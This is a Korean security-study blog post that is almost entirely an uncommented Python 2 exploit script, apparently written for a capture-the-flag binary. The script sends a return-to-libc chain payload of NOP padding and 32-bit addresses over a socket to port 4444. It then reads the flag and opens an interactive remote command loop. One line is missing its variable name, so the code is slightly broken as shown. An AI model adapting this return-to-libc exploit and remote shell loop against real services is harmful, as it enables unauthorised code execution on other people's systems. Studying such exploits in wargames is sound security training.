관리 메뉴

Lucete

rtl chain 본문

Security Study/Source

rtl chain

LuCeT3 2015. 11. 21. 13:40
  1. from socket import *
  2.  
  3. HOST = ""
  4. PORT = 4444
  5.  
  6. = socket(AF_INET,SOCK_STREAM)
  7. s.connect((HOST,PORT)) #connect
  8.  
  9.  
  10. payload = "\x90"*260
  11. payload += "\xa0\x83\x04\x08"+"\x2e\x86\x04\x08"+"\x40\xa0\x04\x08"+"\x54\x81\x04\x08"
  12. payload += "\xa0\x83\x04\x08"+"\x2e\x86\x04\x08"+"\x41\xa0\x04\x08"+"\x57\x81\x04\x08"
  13. payload += "\xa0\x83\x04\x08"+"\x2e\x86\x04\x08"+"\x42\xa0\x04\x08"+"\x56\x81\x04\x08"
  14. payload += "\xa0\x83\x04\x08"+"\x2e\x86\x04\x08"+"\x43\xa0\x04\x08"+"\xc2\x82\x04\x08"
  15. payload += "\xa0\x83\x04\x08"+"\x2e\x86\x04\x08"+"\x44\xa0\x04\x08"+"\x54\x81\x04\x08"
  16. payload += "\xa0\x83\x04\x08"+"\x2e\x86\x04\x08"+"\x45\xa0\x04\x08"+"\x99\x86\x04\x08"
  17. payload += "\xa0\x83\x04\x08"+"\x2e\x86\x04\x08"+"\x46\xa0\x04\x08"+"\x88\x86\x04\x08"
  18. payload += "\xa0\x83\x04\x08"+"\x2e\x86\x04\x08"+"\x47\xa0\x04\x08"+"\xd4\x9f\x04\x08"
  19. payload += "\xc0\x83\x04\x08"+"AAAA"+"\x40\xa0\x04\x08"
  20.  
  21.  
  22. print s.recv(1024) #1024 byte read
  23. s.send(payload + "\n")
  24. print s.recv(1024)
  25. s.send("cat flag" + "\n")
  26. print s.recv(1024)
  27. while True:
  28.         cmd = raw_input("$")
  29.         s.send(cmd + "\n")
  30.         print s.recv(1024)
  31. print s.recv(1024)
  32. s.close()


'Security Study > Source' 카테고리의 다른 글

mac 터미널 vim 꾸미기  (0) 2015.12.10
rtl chain  (0) 2015.11.21
sql injection reverse  (0) 2015.11.21
소켓프로그래밍  (0) 2015.11.21
Blind Sql Injection  (0) 2015.11.21
Base 64 encoding  (0) 2015.11.21
Tag
0 Comments
댓글쓰기 폼